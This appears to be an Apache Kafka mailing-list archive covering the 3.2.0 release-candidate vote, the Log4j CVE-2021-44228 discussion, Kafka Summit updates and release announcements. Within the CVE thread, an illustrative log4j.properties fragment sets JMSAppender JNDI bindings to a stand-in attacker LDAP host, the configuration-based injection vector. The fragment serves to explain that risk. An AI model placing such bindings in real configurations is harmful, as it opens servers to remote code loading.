Re: [kafka-clients] Re: [VOTE] 3.2.0 RC0

2022-04-26 Thread Jun Rao
Hi, Bruno.

Thanks for the reply. Your understanding is correct. This is a regression
introduced only in the 3.2 branch.

Sorry for the late notice.

Jun

On Tue, Apr 26, 2022 at 10:04 AM Bruno Cadonna  wrote:

> Hi Jun,
>
> Thank you for your message!
>
> Now I see how this issue was introduced in 3.2.0. The fix for the bug
> described in KAFKA-12841 introduced it, right? I initially understood
> that the PR you want to include is the fix for the bug described in
> KAFKA-12841 which dates back to 2.6.
>
> I think that classifies as a regression.
>
> I will abort the voting and create a new release candidate.
>
> Best,
> Bruno
>
> On 26.04.22 18:09, 'Jun Rao' via kafka-clients wrote:
> > Hi, Bruno,
> >
> > Could we include https://github.com/apache/kafka/pull/12064 in 3.2.0?
> > This fixes an issue introduced in 3.2.0 where, in some of the error
> > cases, the producer interceptor is called twice for the same record.
> >
> > Thanks,
> >
> > Jun
> >
> > On Tue, Apr 26, 2022 at 6:34 AM Bruno Cadonna <cado...@apache.org> wrote:
> >
> > Hi all,
> >
> > This is a gentle reminder to vote for the first candidate for
> > release of
> > Apache Kafka 3.2.0.
> >
> > I added the 3.2 documentation to the kafka site. That means
> > https://kafka.apache.org/32/documentation.html works now.
> >
> > A successful system test run can be found here:
> > https://jenkins.confluent.io/job/system-test-kafka/job/3.2/24/
> >
> > Thank you to Michal for voting on the release candidate.
> >
> > Best,
> > Bruno
> >
> > On 15.04.22 21:05, Bruno Cadonna wrote:
> >  > Hello Kafka users, developers and client-developers,
> >  >
> >  > This is the first candidate for release of Apache Kafka 3.2.0.
> >  >
> >  > * log4j 1.x is replaced with reload4j (KAFKA-9366)
> >  > * StandardAuthorizer for KRaft (KIP-801)
> >  > * Send a hint to the partition leader to recover the partition
> > (KIP-704)
> >  > * Top-level error code field in DescribeLogDirsResponse (KIP-784)
> >  > * kafka-console-producer writes headers and null values (KIP-798
> and
> >  > KIP-810)
> >  > * JoinGroupRequest and LeaveGroupRequest have a reason attached
> > (KIP-800)
> >  > * Static membership protocol lets the leader skip assignment
> > (KIP-814)
> >  > * Rack-aware standby task assignment in Kafka Streams (KIP-708)
> >  > * Interactive Query v2 (KIP-796, KIP-805, and KIP-806)
> >  > * Connect APIs list all connector plugins and retrieve their
> >  > configuration (KIP-769)
> >  > * TimestampConverter SMT supports different unix time precisions
> > (KIP-808)
> >  > * Connect source tasks handle producer exceptions (KIP-779)
> >  >
> >  > Release notes for the 3.2.0 release:
> >  >
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/RELEASE_NOTES.html
> >
> >  >
> >  > *** Please download, test and vote by Monday, April 25, 9am CEST
> >  >
> >  > Kafka's KEYS file containing PGP keys we use to sign the release:
> >  > https://kafka.apache.org/KEYS
> >  >
> >  > * Release artifacts to be voted upon (source and binary):
> >  > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/
> >  >
> >  > * Maven artifacts to be voted upon:
> >  >
> >  > https://repository.apache.org/content/groups/staging/org/apache/kafka/
> >  >
> >  > * Javadoc:
> >  > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/javadoc/
> >  >
> >  > * Tag to be voted upon (off 3.2 branch) is the 3.2.0 tag:
> >  > https://github.com/apache/kafka/releases/tag/3.2.0-rc0
> >  >

Re: [VOTE] 3.2.0 RC0

2022-04-26 Thread Jun Rao
Hi, Bruno,

Could we include https://github.com/apache/kafka/pull/12064 in 3.2.0? This
fixes an issue introduced in 3.2.0 where, in some of the error cases, the
producer interceptor is called twice for the same record.

Thanks,

Jun
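
As a concrete illustration of what "called twice" means here, a minimal
producer interceptor that counts callbacks would surface the regression as a
mismatch between records sent and acknowledgements received. This is an
illustrative sketch, not part of the fix; the class name and counters are
invented for the example:

    import java.util.Map;
    import java.util.concurrent.atomic.AtomicLong;
    import org.apache.kafka.clients.producer.ProducerInterceptor;
    import org.apache.kafka.clients.producer.ProducerRecord;
    import org.apache.kafka.clients.producer.RecordMetadata;

    public class CountingInterceptor implements ProducerInterceptor<String, String> {
        private final AtomicLong sent = new AtomicLong();
        private final AtomicLong acked = new AtomicLong();

        @Override
        public ProducerRecord<String, String> onSend(ProducerRecord<String, String> record) {
            sent.incrementAndGet();
            return record; // pass the record through unchanged
        }

        @Override
        public void onAcknowledgement(RecordMetadata metadata, Exception exception) {
            // with the 3.2.0 regression, this callback could fire twice
            // for a single record on some error paths
            acked.incrementAndGet();
        }

        @Override
        public void close() {
            System.out.printf("sent=%d acked=%d%n", sent.get(), acked.get());
        }

        @Override
        public void configure(Map<String, ?> configs) {}
    }

The interceptor would be registered through the producer's interceptor.classes
configuration property.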

On Tue, Apr 26, 2022 at 6:34 AM Bruno Cadonna  wrote:

> Hi all,
>
> This is a gentle reminder to vote for the first candidate for release of
> Apache Kafka 3.2.0.
>
> I added the 3.2 documentation to the kafka site. That means
> https://kafka.apache.org/32/documentation.html works now.
>
> A successful system test run can be found here:
> https://jenkins.confluent.io/job/system-test-kafka/job/3.2/24/
>
> Thank you to Michal for voting on the release candidate.
>
> Best,
> Bruno
>
> On 15.04.22 21:05, Bruno Cadonna wrote:
> > Hello Kafka users, developers and client-developers,
> >
> > This is the first candidate for release of Apache Kafka 3.2.0.
> >
> > * log4j 1.x is replaced with reload4j (KAFKA-9366)
> > * StandardAuthorizer for KRaft (KIP-801)
> > * Send a hint to the partition leader to recover the partition (KIP-704)
> > * Top-level error code field in DescribeLogDirsResponse (KIP-784)
> > * kafka-console-producer writes headers and null values (KIP-798 and
> > KIP-810)
> > * JoinGroupRequest and LeaveGroupRequest have a reason attached (KIP-800)
> > * Static membership protocol lets the leader skip assignment (KIP-814)
> > * Rack-aware standby task assignment in Kafka Streams (KIP-708)
> > * Interactive Query v2 (KIP-796, KIP-805, and KIP-806)
> > * Connect APIs list all connector plugins and retrieve their
> > configuration (KIP-769)
> > * TimestampConverter SMT supports different unix time precisions
> (KIP-808)
> > * Connect source tasks handle producer exceptions (KIP-779)
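
The console producer header and null-value support listed above (KIP-798 and
KIP-810) is driven by reader properties. A hypothetical invocation, with
property names taken from the KIPs (check the 3.2 documentation for the exact
defaults and delimiters):

    bin/kafka-console-producer.sh --topic demo --bootstrap-server localhost:9092 \
        --property parse.headers=true --property null.marker=NULL
    # each input line is then read as, e.g.:
    #   h1:v1,h2:v2<TAB>message value
    # and a line whose value is the literal NULL is produced as a null value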
> >
> > Release notes for the 3.2.0 release:
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/RELEASE_NOTES.html
> >
> > *** Please download, test and vote by Monday, April 25, 9am CEST
> >
> > Kafka's KEYS file containing PGP keys we use to sign the release:
> > https://kafka.apache.org/KEYS
> >
> > * Release artifacts to be voted upon (source and binary):
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/
> >
> > * Maven artifacts to be voted upon:
> > https://repository.apache.org/content/groups/staging/org/apache/kafka/
> >
> > * Javadoc:
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/javadoc/
> >
> > * Tag to be voted upon (off 3.2 branch) is the 3.2.0 tag:
> > https://github.com/apache/kafka/releases/tag/3.2.0-rc0
> >
> > * Documentation (not yet ported to kafka-site):
> > https://kafka.apache.org/32/documentation.html
> >
> > * Protocol:
> > https://kafka.apache.org/32/protocol.html
> >
> > * Successful Jenkins builds for the 3.2 branch:
> > I'll share a link once the builds complete
> >
> >
> > /**
> >
> > Thanks,
> > Bruno
>
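
For anyone picking up the thread and wanting to vote: the usual first step is
to import the KEYS file and verify the signature on a downloaded artifact. A
minimal sketch, assuming the Scala 2.13 binary tarball (adjust the file names
to whichever artifact you test):

    wget https://kafka.apache.org/KEYS
    gpg --import KEYS
    wget https://home.apache.org/~cadonna/kafka-3.2.0-rc0/kafka_2.13-3.2.0.tgz
    wget https://home.apache.org/~cadonna/kafka-3.2.0-rc0/kafka_2.13-3.2.0.tgz.asc
    gpg --verify kafka_2.13-3.2.0.tgz.asc kafka_2.13-3.2.0.tgz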


Re: CVE-2021-44228 – Log4j 2 Vulnerability

2021-12-14 Thread Jun Rao
Hi, Everyone,

Just to provide an update. https://kafka.apache.org/cve-list is now updated
with this CVE.

Thanks,

Jun

On Tue, Dec 14, 2021 at 3:30 PM Jun Rao  wrote:

> Hi, Israel,
>
> Randall added some clarification for the connectors in the PR.
>
> Thanks,
>
> Jun
>
> On Tue, Dec 14, 2021 at 12:10 PM Israel Ekpo  wrote:
>
>> Do we want to add a disclaimer that users need to check their connectors
>> to see if they use log4j2?
>>
>> Though the core library does not use this dependency, it is possible
>> external connectors that use it could introduce vulnerabilities if they
>> depend on the affected log4j2 version
>>
>>
>> On Tue, Dec 14, 2021 at 1:40 PM Israel Ekpo  wrote:
>>
>> > Sure I will take a look at it shortly
>> >
>> > On Tue, Dec 14, 2021 at 12:44 PM Jun Rao 
>> wrote:
>> >
>> >> Hi, Luke,
>> >>
>> >> Thanks for the analysis. We are trying to put a public statement on
>> this
>> >> through this PR: https://github.com/apache/kafka-site/pull/388. If
>> anyone
>> >> has more feedback, we can iterate on the PR.
>> >>
>> >> Thanks,
>> >>
>> >> Jun
>> >>
>> >>
>> >> On Tue, Dec 14, 2021 at 7:53 AM Murilo Tavares 
>> >> wrote:
>> >>
>> >> > What about Kafka-Connect?
>> >> > Anyone has checked if any of the Confluent KafkaConnect docker images
>> >> embed
>> >> > log4j v2?
>> >> > Thanks
>> >> >
>> >> > On Mon, 13 Dec 2021 at 21:39, Luke Chen  wrote:
>> >> >
>> >> > > Hi all,
>> >> > >
>> >> > > Here are the comments on the CVE-2021-44228 vulnerability *from the
>> >> > > SLF4J project*.
>> >> > > REF: http://slf4j.org/log4shell.html
>> >> > >
>> >> > > I think it's an analysis worth reading. Most importantly, it has
>> >> > > comments about log4j 1.x versions, which Kafka currently uses.
>> >> > > I quote some sentences here for your reference:
>> >> > >
>> >> > > 1. As *log4j 1.x *does NOT offer a JNDI look up mechanism at the
>> >> message
>> >> > > level,* it does NOT suffer from CVE-2021-44228.*
>> >> > > 2. However, log4j 1.x comes with JMSAppender which will perform a
>> JNDI
>> >> > > lookup if enabled in log4j's configuration file, i.e.
>> >> *log4j.properties*
>> >> > or
>> >> > > *log4j.xml*.
>> >> > > 3. In the absence of a new log4j 1.x release, you can remove
>> >> JMSAppender
>> >> > > from the *log4j-1.2.17.jar* artifact yourself. (commands are
>> listed in
>> >> > the
>> >> > > page <http://slf4j.org/log4shell.html>)
>> >> > > 4. Therefore, in addition to hardening KNOWN vulnerable components
>> in
>> >> > > aforementioned frameworks, we also recommend that *configuration
>> >> files be
>> >> > > protected against write access*. In Unix-speak they should be
>> >> *read-only
>> >> > > for all users, including the owner*. If possible, they should also
>> be
>> >> > > monitored against changes and unauthorized manipulation.
>> >> > >
>> >> > > Thank you.
>> >> > > Luke
>> >> > >
>> >> > > On Tue, Dec 14, 2021 at 12:55 AM David Ballano Fernandez <
>> >> > > dfernan...@demonware.net> wrote:
>> >> > >
>> >> > > > Thanks guys!
>> >> > > >
>> >> > > > On Mon, Dec 13, 2021 at 7:43 AM Brian Rickabaugh <
>> >> br...@rickabaugh.net
>> >> > >
>> >> > > > wrote:
>> >> > > >
>> >> > > > >   I strongly recommend that the Kafka community publish a
>> >> statement
>> >> > on
>> >> > > > this
>> >> > > > > vulnerability.
>> >> > > > >
>> >> > > > > This Log4J exploit is getting a lot of publicity in my
>> >> organization
>> >> > > and a
>> >> > > > > page to point our security team to would be very helpful.
>> >> > > > >
>> >

Re: CVE-2021-44228 – Log4j 2 Vulnerability

2021-12-14 Thread Jun Rao
Hi, Israel,

Randall added some clarification for the connectors in the PR.

Thanks,

Jun

On Tue, Dec 14, 2021 at 12:10 PM Israel Ekpo  wrote:

> Do we want to add a disclaimer that users need to check their connectors to
> see if they use log4j2?
>
> Though the core library does not use this dependency, it is possible
> external connectors that use it could introduce vulnerabilities if they
> depend on the affected log4j2 version
>
>
> On Tue, Dec 14, 2021 at 1:40 PM Israel Ekpo  wrote:
>
> > Sure I will take a look at it shortly
> >
> > On Tue, Dec 14, 2021 at 12:44 PM Jun Rao 
> wrote:
> >
> >> Hi, Luke,
> >>
> >> Thanks for the analysis. We are trying to put a public statement on this
> >> through this PR: https://github.com/apache/kafka-site/pull/388. If
> anyone
> >> has more feedback, we can iterate on the PR.
> >>
> >> Thanks,
> >>
> >> Jun
> >>
> >>
> >> On Tue, Dec 14, 2021 at 7:53 AM Murilo Tavares 
> >> wrote:
> >>
> >> > What about Kafka-Connect?
> >> > Anyone has checked if any of the Confluent KafkaConnect docker images
> >> embed
> >> > log4j v2?
> >> > Thanks
> >> >
> >> > On Mon, 13 Dec 2021 at 21:39, Luke Chen  wrote:
> >> >
> >> > > Hi all,
> >> > >
> >> > > Here are the comments on the CVE-2021-44228 vulnerability *from the
> >> > > SLF4J project*.
> >> > > REF: http://slf4j.org/log4shell.html
> >> > >
> >> > > I think it's an analysis worth reading. Most importantly, it has
> >> > > comments about log4j 1.x versions, which Kafka currently uses.
> >> > > I quote some sentences here for your reference:
> >> > >
> >> > > 1. As *log4j 1.x *does NOT offer a JNDI look up mechanism at the
> >> message
> >> > > level,* it does NOT suffer from CVE-2021-44228.*
> >> > > 2. However, log4j 1.x comes with JMSAppender which will perform a
> JNDI
> >> > > lookup if enabled in log4j's configuration file, i.e.
> >> *log4j.properties*
> >> > or
> >> > > *log4j.xml*.
> >> > > 3. In the absence of a new log4j 1.x release, you can remove
> >> JMSAppender
> >> > > from the *log4j-1.2.17.jar* artifact yourself. (commands are listed
> in
> >> > the
> >> > > page <http://slf4j.org/log4shell.html>)
> >> > > 4. Therefore, in addition to hardening KNOWN vulnerable components
> in
> >> > > aforementioned frameworks, we also recommend that *configuration
> >> files be
> >> > > protected against write access*. In Unix-speak they should be
> >> *read-only
> >> > > for all users, including the owner*. If possible, they should also
> be
> >> > > monitored against changes and unauthorized manipulation.
> >> > >
> >> > > Thank you.
> >> > > Luke
> >> > >
> >> > > On Tue, Dec 14, 2021 at 12:55 AM David Ballano Fernandez <
> >> > > dfernan...@demonware.net> wrote:
> >> > >
> >> > > > Thanks guys!
> >> > > >
> >> > > > On Mon, Dec 13, 2021 at 7:43 AM Brian Rickabaugh <
> >> br...@rickabaugh.net
> >> > >
> >> > > > wrote:
> >> > > >
> >> > > > >   I strongly recommend that the Kafka community publish a
> >> statement
> >> > on
> >> > > > this
> >> > > > > vulnerability.
> >> > > > >
> >> > > > > This Log4J exploit is getting a lot of publicity in my
> >> organization
> >> > > and a
> >> > > > > page to point our security team to would be very helpful.
> >> > > > >
> >> > > > > Brian
> >> > > > >
> >> > > > > Quoting Luke Chen :
> >> > > > >
> >> > > > > > Because this vulnerability is quite critical and "popular"
> >> > > > > > these days,
> >> > > > > > should *Kafka have an official announcement in our security
> cve
> >> > list
> >> > > > page
> >> > > > > > or somewhere*? (i.e.
> >> > > > >
> >> > > >
> >> > >
> >> >

Re: CVE-2021-44228 – Log4j 2 Vulnerability

2021-12-14 Thread Jun Rao
Hi, Luke,

Thanks for the analysis. We are trying to put a public statement on this
through this PR: https://github.com/apache/kafka-site/pull/388. If anyone
has more feedback, we can iterate on the PR.

Thanks,

Jun


On Tue, Dec 14, 2021 at 7:53 AM Murilo Tavares  wrote:

> What about Kafka-Connect?
> Anyone has checked if any of the Confluent KafkaConnect docker images embed
> log4j v2?
> Thanks
>
> On Mon, 13 Dec 2021 at 21:39, Luke Chen  wrote:
>
> > Hi all,
> >
> > Here are the comments on the CVE-2021-44228 vulnerability *from the
> > SLF4J project*.
> > REF: http://slf4j.org/log4shell.html
> >
> > I think it's an analysis worth reading. Most importantly, it has
> > comments about log4j 1.x versions, which Kafka currently uses.
> > I quote some sentences here for your reference:
> >
> > 1. As *log4j 1.x *does NOT offer a JNDI look up mechanism at the message
> > level,* it does NOT suffer from CVE-2021-44228.*
> > 2. However, log4j 1.x comes with JMSAppender which will perform a JNDI
> > lookup if enabled in log4j's configuration file, i.e. *log4j.properties*
> or
> > *log4j.xml*.
> > 3. In the absence of a new log4j 1.x release, you can remove JMSAppender
> > from the *log4j-1.2.17.jar* artifact yourself. (commands are listed in
> the
> > page <http://slf4j.org/log4shell.html>)
> > 4. Therefore, in addition to hardening KNOWN vulnerable components in
> > aforementioned frameworks, we also recommend that *configuration files be
> > protected against write access*. In Unix-speak they should be *read-only
> > for all users, including the owner*. If possible, they should also be
> > monitored against changes and unauthorized manipulation.
> >
> > Thank you.
> > Luke
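
Point 3 above refers to the mitigation published on the slf4j page; both
hardening steps come down to two commands. A sketch, assuming the jar and the
logging configuration sit in the current directory:

    # remove the JNDI-capable appender from the log4j 1.x jar (slf4j's command)
    zip -q -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class

    # point 4: make the configuration read-only for all users, including the owner
    chmod 444 log4j.properties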
> >
> > On Tue, Dec 14, 2021 at 12:55 AM David Ballano Fernandez <
> > dfernan...@demonware.net> wrote:
> >
> > > Thanks guys!
> > >
> > > On Mon, Dec 13, 2021 at 7:43 AM Brian Rickabaugh <br...@rickabaugh.net>
> > > wrote:
> > >
> > > >   I strongly recommend that the Kafka community publish a statement
> on
> > > this
> > > > vulnerability.
> > > >
> > > > This Log4J exploit is getting a lot of publicity in my organization
> > and a
> > > > page to point our security team to would be very helpful.
> > > >
> > > > Brian
> > > >
> > > > Quoting Luke Chen :
> > > >
> > > > > Because this vulnerability is quite critical and "popular" these
> > > > > days,
> > > > > should *Kafka have an official announcement in our security cve
> list
> > > page
> > > > > or somewhere*? (i.e.
> > > > > https://kafka.apache.org/cve-list
> > > > )
> > > > >
> > > > > So far, my assessment is that Kafka is not using log4j 2.x
> > > > > versions, so the risk is lower.
> > > > > Kafka is using a log4j 1.x version. As long as users don't set
> > > > > the JMS appender with *TopicBindingName* or
> > > > > *TopicConnectionFactoryBindingName* configured to something JNDI
> > > > > can handle (ex: "ldap://host:port/a"), it is safe. (Usually we
> > > > > don't set the topic name or factory name to that kind of value.)
> > > > >
> > > > > One thing to add is that we are currently working on upgrading
> > > > > log4j 1 to log4j 2 (KAFKA-9366
> > > > > <https://issues.apache.org/jira/browse/KAFKA-9366>), and we'll
> > > > > make sure it upgrades to 2.15.0 or a newer version.
> > > > >
> > > > > Thank you.
> > > > > Luke
> > > > >
> > > > > On Sun, Dec 12, 2021 at 12:00 PM Luke Chen 
> > wrote:
> > > > >
> > > > >> Hi David Ballano Fernandez and all,
> > > > >>
> > > > >> Some update here:
> > > > >> Based on @TopStreamsNet's comment here:
> > > > >> https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301
> > > > >> log4j 1.x versions can still be vulnerable to this issue, but
> > > > >> only when the JMS configuration *TopicBindingName* or
> > > > >> *TopicConnectionFactoryBindingName* is set to something that
> > > > >> JNDI can handle - for example "ldap://host:port/a". In this way,
> > > > >> JNDI will do exactly the same thing it does for 2.x.
> > > > >> That is, *1.x is vulnerable, just the attack vector is "safer"
> > > > >> as it depends on configuration rather than user input.*
> > > > >>
> > > > >> So, in short, 
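
To make the configuration-based attack vector concrete: the risky shape would
look something like the following hypothetical log4j.properties fragment (the
appender name and LDAP addresses are invented for illustration; do not use):

    log4j.appender.jms=org.apache.log4j.net.JMSAppender
    log4j.appender.jms.TopicBindingName=ldap://attacker.example:1389/a
    log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://attacker.example:1389/cf

Without such a JNDI-resolvable binding in the configuration, log4j 1.x does
not perform the lookup that makes 2.x exploitable via message content.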

Re: updates on Kafka Summit in 2020

2020-04-28 Thread Jun Rao
Hi, Everyone,

Given the current global health crisis and ongoing uncertainty, we have
decided to go virtual for Kafka Summit "Austin."  The CFP deadline has been
extended to May 17, 2020. More details can be found at
https://events.kafka-summit.org/2020-faq.

Thanks,

Jun

On Wed, Apr 15, 2020 at 4:52 PM Jun Rao  wrote:

> Hi, Everyone,
>
> Here is an update on the upcoming Kafka Summit events in 2020.
>
> 1. Unfortunately, Kafka Summit London, originally planned on Apr 27/28,
> has been cancelled due to COVID-19.
>
> 2. Kafka Summit Austin (Aug 24/25) is still on. The CFP (
> https://events.kafka-summit.org/kafka-summit-austin-2020) is open until
> May 1.
>
> Thanks,
>
> Jun
>


updates on Kafka Summit in 2020

2020-04-15 Thread Jun Rao
Hi, Everyone,

Here is an update on the upcoming Kafka Summit events in 2020.

1. Unfortunately, Kafka Summit London, originally planned on Apr 27/28, has
been cancelled due to COVID-19.

2. Kafka Summit Austin (Aug 24/25) is still on. The CFP (
https://events.kafka-summit.org/kafka-summit-austin-2020) is open until May
1.

Thanks,

Jun


Re: [kafka-clients] [VOTE] 2.5.0 RC3

2020-04-13 Thread Jun Rao
Hi, David,

Thanks for running the release. Verified quickstart on the scala 2.12
binary. +1 from me.

Jun
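
For reference, "verified quickstart" amounts to running the steps from the
quickstart guide against the extracted binary. A sketch, assuming the Scala
2.12 artifact and single-broker defaults (flags as in the 2.5 docs):

    tar -xzf kafka_2.12-2.5.0.tgz && cd kafka_2.12-2.5.0
    bin/zookeeper-server-start.sh config/zookeeper.properties &
    bin/kafka-server-start.sh config/server.properties &
    bin/kafka-topics.sh --create --topic test --partitions 1 \
        --replication-factor 1 --bootstrap-server localhost:9092
    echo "hello kafka" | bin/kafka-console-producer.sh --topic test \
        --bootstrap-server localhost:9092
    bin/kafka-console-consumer.sh --topic test --from-beginning \
        --bootstrap-server localhost:9092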

On Tue, Apr 7, 2020 at 9:03 PM David Arthur  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the fourth candidate for release of Apache Kafka 2.5.0.
>
> * TLS 1.3 support (1.2 is now the default)
> * Co-groups for Kafka Streams
> * Incremental rebalance for Kafka Consumer
> * New metrics for better operational insight
> * Upgrade Zookeeper to 3.5.7
> * Deprecate support for Scala 2.11
>
> Release notes for the 2.5.0 release:
> https://home.apache.org/~davidarthur/kafka-2.5.0-rc3/RELEASE_NOTES.html
>
> *** Please download, test and vote by Friday April 10th 5pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> https://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> https://home.apache.org/~davidarthur/kafka-2.5.0-rc3/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * Javadoc:
> https://home.apache.org/~davidarthur/kafka-2.5.0-rc3/javadoc/
>
> * Tag to be voted upon (off 2.5 branch) is the 2.5.0 tag:
> https://github.com/apache/kafka/releases/tag/2.5.0-rc3
>
> * Documentation:
> https://kafka.apache.org/25/documentation.html
>
> * Protocol:
> https://kafka.apache.org/25/protocol.html
>
> Successful Jenkins builds to follow
>
> Thanks!
> David
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/kafka-clients/CA%2B0Ze6rUxaPRvddHb50RfVxRtHHvnJD8j9Q9ni18Okc9s-_DSQ%40mail.gmail.com
> 
> .
>


[ANNOUNCE] New committer: Mickael Maison

2019-11-07 Thread Jun Rao
Hi, Everyone,

The PMC of Apache Kafka is pleased to announce a new Kafka committer Mickael
Maison.

Mickael has been contributing to Kafka since 2016. He proposed and
implemented multiple KIPs. He has also been promoting Kafka through blogs
and public talks.

Congratulations, Mickael!

Thanks,

Jun (on behalf of the Apache Kafka PMC)


Re: Add me to the contributors list...

2019-10-10 Thread Jun Rao
Hi, Senthil,

Thanks for your interest. Just added you to the contributors list and gave
you the wiki permissions.

Jun

On Thu, Oct 10, 2019 at 5:26 PM Senthilnathan Muthusamy
 wrote:

> Hi,
>
> I am Senthil from Microsoft Azure Compute and will be contributing to the
> KIP-280. Can you please add me to the contributors list and provide access
> to the KIP-280, JIRA & the repo.
>
> My details:
> Name: Senthilnathan Muthusamy
> Username: senthilm-ms
> Email: senth...@microsoft.com
>
> Thanks,
> Senthil
>


[ANNOUNCE] New Kafka PMC member: Sriharsh Chintalapan

2019-04-18 Thread Jun Rao
Hi, Everyone,

Sriharsh Chintalapan has been active in the Kafka community since he became
a Kafka committer in 2015. I am glad to announce that Harsh is now a member
of the Kafka PMC.

Congratulations, Harsh!

Jun


Re: [kafka-clients] [VOTE] 2.1.1 RC2

2019-02-14 Thread Jun Rao
Hi, Colin,

Thanks for running the release. Verified the quickstart for 2.12 binary. +1
from me.

Jun

On Fri, Feb 8, 2019 at 12:02 PM Colin McCabe  wrote:

> Hi all,
>
> This is the third candidate for release of Apache Kafka 2.1.1.  This
> release includes many bug fixes for Apache Kafka 2.1.
>
> Compared to rc1, this release includes the following changes:
> * MINOR: release.py: fix some compatibility problems.
> * KAFKA-7897; Disable leader epoch cache when older message formats are
> used
> * KAFKA-7902: Replace original loginContext if SASL/OAUTHBEARER refresh
> login fails
> * MINOR: Fix more places where the version should be bumped from 2.1.0 ->
> 2.1.1
> * KAFKA-7890: Invalidate ClusterConnectionState cache for a broker if the
> hostname of the broker changes.
> * KAFKA-7873; Always seek to beginning in KafkaBasedLog
> * MINOR: Correctly set dev version in version.py
>
> Check out the release notes here:
> http://home.apache.org/~cmccabe/kafka-2.1.1-rc2/RELEASE_NOTES.html
>
> The vote will go until Wednesday, February 13th.
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~cmccabe/kafka-2.1.1-rc2/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~cmccabe/kafka-2.1.1-rc2/javadoc/
>
> * Tag to be voted upon (off 2.1 branch) is the 2.1.1 tag:
> https://github.com/apache/kafka/releases/tag/2.1.1-rc2
>
> * Jenkins builds for the 2.1 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-2.1-jdk8/
>
> Thanks to everyone who tested the earlier RCs.
>
> cheers,
> Colin
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/kafka-clients/ea314ca1-d23a-47c4-8fc7-83b9b1c792db%40www.fastmail.com
> .
> For more options, visit https://groups.google.com/d/optout.
>


Hackathons with funding of the EU

2019-02-12 Thread Jun Rao
Hi Guys,

I am passing along the following info from EU. If you are interested in the
event, please contact the coordinator. Thanks.

The EU via its EU-FOSSA 2 project have invited a number of communities
including Apache Kafka to consider taking one of their 3 planned Hackathons
this year, to be held in Brussels on 6/7 April, 4/5 May and 5/6 Oct. They
will also pay for transportation, accommodation and food for 35-50
individuals (plus/minus) for each event. Each event will be dedicated to
one open source community.

I am sending this email to establish the level of interest within the Kafka
community for such an event. Let me know. Here is some more background.

EU-FOSSA 2 Hackathons

The EU-FOSSA 2 project aims to improve security of open source software the
European institutions use, e.g. via Bug Bounties and other initiatives. The
project also aims to bring open source communities together via three
planned Hackathons in Brussels. At these Hackathons, the software community
can solve any problems they feel necessary, security or non-security.

Though Security is the main project theme, it is not a prerequisite that
the community fix bugs at the Hackathon or that they work on a specific
thing at all. The main idea is to bring them together if they think that’s
helpful to them - and ideally bring them together in Brussels with EU
institutions folk involved in that community.

Hackathon Ideas/Themes

   - hold competitions, and/or discuss other ways to benefit/strengthen the
   community, and in doing so ensure continuity and benefit for the open
   source community
   - look at say, software governance, risk management, release management,
   architecture, new features/roadmap, embracing new technologies/ideas to
   help improve the software or related subjects
   - Or any other idea on what the community needs or could benefit from

Contact: Miss Suwon Ham at s...@bemyapp.com

Jun


Re: [ANNOUNCE] New Committer: Vahid Hashemian

2019-01-15 Thread Jun Rao
Congratulations, Vahid.

Thanks,

Jun

On Tue, Jan 15, 2019 at 2:45 PM Jason Gustafson  wrote:

> Hi All,
>
> The PMC for Apache Kafka has invited Vahid Hashemian as a project
> committer and
> we are
> pleased to announce that he has accepted!
>
> Vahid has made numerous contributions to the Kafka community over the past
> few years. He has authored 13 KIPs with core improvements to the consumer
> and the tooling around it. He has also contributed nearly 100 patches
> affecting all parts of the codebase. Additionally, Vahid puts a lot of
> effort into community engagement, helping others on the mail lists and
> sharing his experience at conferences and meetups.
>
> We appreciate the contributions and we are looking forward to more.
> Congrats Vahid!
>
> Jason, on behalf of the Apache Kafka PMC
>


Re: Kafka Summit NYC and London in 2019

2018-12-17 Thread Jun Rao
Hi, Everyone,

This is a reminder about the deadline for proposal this Thursday.

Thanks,

Jun

On Tue, Dec 4, 2018 at 1:49 PM Jun Rao  wrote:

> Hi, Everyone,
>
> We have two upcoming Kafka Summits, one in NYC and another in London. The
> deadline for submitting proposals is Dec 20 for both events. Please consider
> submitting a proposal if you are interested. The links to submit abstracts
> are
>
> Kafka Summit NYC - https://myeventi.events/kafka19/ny/cfp/
> Kafka Summit London - https://myeventi.events/kafka19/gb/cfp/
>
> Thanks,
>
> Jun
>


Kafka Summit NYC and London in 2019

2018-12-04 Thread Jun Rao
Hi, Everyone,

We have two upcoming Kafka Summits, one in NYC and another in London. The
deadline for submitting proposals is Dec 20 for both events. Please consider
submitting a proposal if you are interested. The links to submit abstracts
are

Kafka Summit NYC - https://myeventi.events/kafka19/ny/cfp/
Kafka Summit London - https://myeventi.events/kafka19/gb/cfp/

Thanks,

Jun


Re: [ANNOUNCE] Apache Kafka 2.0.1

2018-11-09 Thread Jun Rao
Thanks for running the release, Mani!

Jun

On Fri, Nov 9, 2018 at 11:42 AM, Manikumar  wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 2.0.1
>
> This is a bug fix release and it includes fixes and improvements from 51
> JIRAs.
>
> All of the changes in this release can be found in the release notes:
> https://www.apache.org/dist/kafka/2.0.1/RELEASE_NOTES.html
>
>
